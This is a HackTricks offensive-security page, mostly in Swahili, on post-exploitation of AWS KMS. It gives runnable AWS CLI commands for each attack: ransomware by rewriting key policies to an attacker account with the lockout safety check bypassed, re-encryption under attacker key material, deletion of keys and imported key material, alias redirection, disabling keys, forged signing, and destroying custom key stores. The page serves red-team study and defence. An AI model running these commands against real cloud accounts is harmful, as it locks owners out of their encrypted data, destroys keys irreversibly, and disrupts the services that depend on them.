AWS - KMS Post Exploitation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

KMS

Kwa maelezo zaidi angalia:

AWS - KMS Enum

Encrypt/Decrypt information

fileb:// na file:// ni URI schemes zinazotumika katika amri za AWS CLI kubainisha njia za faili za ndani:

  • fileb://: Husoma faili katika mode ya binary, mara nyingi kutumika kwa faili zisizo za maandishi.
  • file://: Husoma faili katika mode ya maandishi, kawaida kutumika kwa faili za maandishi rahisi, scripts, au JSON ambazo hazina mahitaji maalum ya encoding.

Tip

Kumbuka kuwa ikiwa unataka decrypt data ndani ya faili, faili lazima iwe na data ya binary, si base64 encoded data. (fileb://)

  • Using a symmetric key
# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
  • Kutumia ufunguo asymmetric:
# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Mshambuliaji aliye na ufikiaji wa kipekee kwa KMS anaweza kubadilisha sera ya KMS ya funguo na kumpa akaunti yake ufikiaji juu yao, kuondoa ufikiaji uliotolewa kwa akaunti halali.

Kisha, watumiaji wa akaunti halali hawawezi kupata taarifa yoyote ya huduma yoyote iliyosimbwa na funguo hizo, na hivyo kuunda ransomware rahisi lakini yenye ufanisi dhidi ya akaunti.

Warning

Kumbuka kwamba AWS managed keys aren’t affected na shambulio hili; ni Customer managed keys tu.

Pia kumbuka hitaji la kutumia param --bypass-policy-lockout-safety-check (ukosefu wa chaguo hili kwenye web console hufanya shambulio hili liwe linawezekana tu kutoka CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Caution

Kumbuka kwamba ikiwa utabadilisha sera hiyo na kutoa ufikiaji kwa external account pekee, na kisha kutoka kwenye external account hii ukajaribu kuweka sera mpya ili kurudisha ufikiaji kwa original account, hautaweza kwa sababu Put Polocy action cannot be performed from a cross account.

Generic KMS Ransomware

There is another way to perform a global KMS Ransomware, which would involve the following steps:

  • Tengeneza mpya key with a key material iliyopakiwa na attacker
  • Re-encrypt older data ya victim iliyokuwa encrypted na previous version kwa kutumia ile mpya
  • Delete the KMS key
  • Sasa ni attacker pekee, ambaye ana original key material, angeweza decrypt the encrypted data

Delete Keys via kms:DeleteImportedKeyMaterial

With the kms:DeleteImportedKeyMaterial permission, an actor can delete the imported key material from CMKs with Origin=EXTERNAL (CMKs that have imported their key material), making them unable to decrypt data. This action is destructive and irreversible unless compatible material is re-imported, allowing an attacker to effectively cause ransomware-like data loss by rendering encrypted information permanently inaccessible.

aws kms delete-imported-key-material --key-id <Key_ID>

Kuangamiza keys

Kuangamiza keys kunaweza kusababisha DoS.

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Caution

Kumbuka kwamba AWS sasa inazuia vitendo vya awali kutekelezwa kutoka kwa akaunti nyingine:

Change or delete Alias

Shambulio hili huondoa au kuielekeza upya aliases za AWS KMS, kuvunja utambuzi wa funguo na kusababisha kushindwa mara moja kwa huduma zozote zinazotegemea aliases hizo, na kusababisha denial-of-service. Kwa ruhusa kama kms:DeleteAlias au kms:UpdateAlias mshambuliaji anaweza kuondoa au kuielekeza upya alias na kuharibu cryptographic operations (mf., encrypt, describe). Huduma yoyote inayorejea alias badala ya key ID inaweza kushindwa hadi alias itakaporejeshwa au kurekebishwa kwa usahihi.

# Delete Alias
aws kms delete-alias --alias-name alias/<key_alias>

# Update Alias
aws kms update-alias \
--alias-name alias/<key_alias> \
--target-key-id <new_target_key>

Cancel Key Deletion

Kwa ruhusa kama kms:CancelKeyDeletion na kms:EnableKey, mhusika anaweza kuhairisha ufutaji uliopangwa wa AWS KMS customer master key na baadaye kuuiwasha tena. Hilo huirudisha ufunguo (awali katika Disabled state) na kurejesha uwezo wake wa decrypt data iliyokuwa imehifadhiwa awali, hivyo kuwezesha exfiltration.

# Firts cancel de deletion
aws kms cancel-key-deletion \
--key-id <Key_ID>

## Second enable the key
aws kms enable-key \
--key-id <Key_ID>

Kuzima Key

Kwa ruhusa ya kms:DisableKey, mtendaji anaweza kuzima AWS KMS customer master key (CMK), kuizuia kutumika kwa encryption au decryption.

Hii inavunja ufikiaji kwa huduma yoyote inayomtegemea CMK hiyo na inaweza kusababisha usumbufu wa papo hapo au denial-of-service hadi key itakapowezeshwa tena.

aws kms disable-key \
--key-id <key_id>

Pata Siri ya Pamoja

Kwa ruhusa ya kms:DeriveSharedSecret, mhusika anaweza kutumia funguo binafsi inayoshikiliwa na KMS pamoja na funguo ya umma iliyotolewa na mtumiaji kukokotoa siri ya pamoja ya ECDH.

aws kms derive-shared-secret \
--key-id <key_id> \
--public-key fileb:///<route_to_public_key> \
--key-agreement-algorithm <algorithm>

Impersonation via kms:Sign

Kwa ruhusa ya kms:Sign, mhusika anaweza kutumia CMK iliyohifadhiwa kwenye KMS kusaini data kwa njia ya cryptography bila kufichua private key, akitengeneza saini halali ambazo zinaweza kuwezesha impersonation au kuruhusu vitendo vibaya.

aws kms sign \
--key-id <key-id> \
--message fileb://<ruta-al-archivo> \
--signing-algorithm <algoritmo> \
--message-type RAW

DoS with Custom Key Stores

Kwa ruhusa kama kms:DeleteCustomKeyStore, kms:DisconnectCustomKeyStore, au kms:UpdateCustomKeyStore, mtumiaji anaweza kubadilisha, kutenganisha, au kufuta AWS KMS Custom Key Store (CKS), na kufanya vifunguo vyake vya msingi visifanye kazi. Hii itavunja shughuli za encryption, decryption, na signing kwa huduma zote zinazotegemea vifunguo hivyo na inaweza kusababisha denial-of-service mara moja. Kudhibiti na kufuatilia ruhusa hizo ni muhimu.

aws kms delete-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms disconnect-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms update-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID> --new-custom-key-store-name <NEW_NAME> --key-store-password <NEW_PASSWORD>

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks